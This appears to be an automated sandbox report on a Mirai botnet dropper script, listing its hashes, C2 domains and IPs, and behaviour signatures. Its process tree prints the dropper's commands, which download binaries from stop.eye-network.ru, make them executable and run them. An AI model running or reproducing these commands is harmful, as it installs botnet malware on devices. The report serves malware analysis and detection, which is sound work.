Analysis

  • max time kernel
    133s
  • max time network
    145s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
  • submitted
    18-12-2024 13:20

General

  • Target

    wget.sh

  • Size

    676B

  • MD5

    5b3ceaec7a3ad11b45f5fca1b603d939

  • SHA1

    5e5ee3fa232288f77e670c66d8ca42c0cc171e45

  • SHA256

    bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa

  • SHA512

    47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

C2

boats.dogmuncher.xyz

89.190.156.145

Extracted

Family

mirai

Botnet

BOTNET

C2

89.190.156.145

boats.dogmuncher.xyz

Extracted

Family

mirai

Botnet

BOTNET

C2

boats.dogmuncher.xyz

89.190.156.145

Extracted

Family

mirai

C2

89.190.156.1

89.190.156.145

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 1 IoCs
  • Reads runtime system information 56 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 10 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
      PID:711
      • /usr/bin/wget
        wget http://stop.eye-network.ru/wkb86
        2⤵
        • Writes file to tmp directory
        PID:715
      • /bin/chmod
        chmod +x systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:734
      • /tmp/wkb86
        ./wkb86 telnet
        2⤵
        • Executes dropped EXE
        PID:735
      • /usr/bin/wget
        wget http://stop.eye-network.ru/kqibeps
        2⤵
        • Writes file to tmp directory
        PID:738
      • /bin/chmod
        chmod +x kqibeps systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:743
      • /tmp/kqibeps
        ./kqibeps telnet
        2⤵
        • Deletes itself
        • Executes dropped EXE
        • Changes its process name
        • Reads runtime system information
        PID:744
      • /usr/bin/wget
        wget http://stop.eye-network.ru/bojwsl
        2⤵
        • Writes file to tmp directory
        PID:747
      • /bin/chmod
        chmod +x bojwsl systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:751
      • /tmp/bojwsl
        ./bojwsl telnet
        2⤵
        • Executes dropped EXE
        PID:752
      • /usr/bin/wget
        wget http://stop.eye-network.ru/njvwa4
        2⤵
        • Writes file to tmp directory
        PID:754
      • /bin/chmod
        chmod +x bojwsl njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:755
      • /tmp/njvwa4
        ./njvwa4 telnet
        2⤵
        • Executes dropped EXE
        PID:756
      • /usr/bin/wget
        wget http://stop.eye-network.ru/ngwa5
        2⤵
        • Writes file to tmp directory
        PID:758
      • /bin/chmod
        chmod +x bojwsl ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:761
      • /tmp/ngwa5
        ./ngwa5 telnet
        2⤵
        • Executes dropped EXE
        PID:762
      • /usr/bin/wget
        wget http://stop.eye-network.ru/woega6
        2⤵
        • Writes file to tmp directory
        PID:765
      • /bin/chmod
        chmod +x bojwsl ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega6
        2⤵
        • File and Directory Permissions Modification
        PID:783
      • /tmp/woega6
        ./woega6 telnet
        2⤵
        • Executes dropped EXE
        PID:785
      • /usr/bin/wget
        wget http://stop.eye-network.ru/fnkea7
        2⤵
        • Writes file to tmp directory
        PID:787
      • /bin/chmod
        chmod +x bojwsl fnkea7 ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega6
        2⤵
        • File and Directory Permissions Modification
        PID:797
      • /tmp/fnkea7
        ./fnkea7 telnet
        2⤵
        • Executes dropped EXE
        PID:799
      • /usr/bin/wget
        wget http://stop.eye-network.ru/gnjqwpc
        2⤵
        • Writes file to tmp directory
        PID:801
      • /bin/chmod
        chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega6
        2⤵
        • File and Directory Permissions Modification
        PID:815
      • /tmp/gnjqwpc
        ./gnjqwpc telnet
        2⤵
        • Executes dropped EXE
        PID:817
      • /usr/bin/wget
        wget http://stop.eye-network.ru/wlw68k
        2⤵
        • Writes file to tmp directory
        PID:821
      • /bin/chmod
        chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 wlw68k woega6
        2⤵
        • File and Directory Permissions Modification
        PID:828
      • /tmp/wlw68k
        ./wlw68k telnet
        2⤵
        • Executes dropped EXE
        PID:830
      • /usr/bin/wget
        wget http://stop.eye-network.ru/wrjkngh4
        2⤵
        • Writes file to tmp directory
        PID:832
      • /bin/chmod
        chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 wlw68k woega6 wrjkngh4
        2⤵
        • File and Directory Permissions Modification
        PID:833
      • /tmp/wrjkngh4
        ./wrjkngh4 telnet
        2⤵
        • Executes dropped EXE
        PID:834

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • /tmp/bojwsl

      Filesize

      209KB

    • /tmp/fnkea7

      Filesize

      211KB

    • /tmp/gnjqwpc

      Filesize

      158KB

    • /tmp/kqibeps

      Filesize

      206KB

    • /tmp/ngwa5

      Filesize

      154KB

    • /tmp/njvwa4

      Filesize

      158KB

    • /tmp/wkb86

      Filesize

      113KB

    • /tmp/wlw68k

      Filesize

      175KB

    • /tmp/woega6

      Filesize

      166KB

    • /tmp/wrjkngh4

      Filesize

      142KB
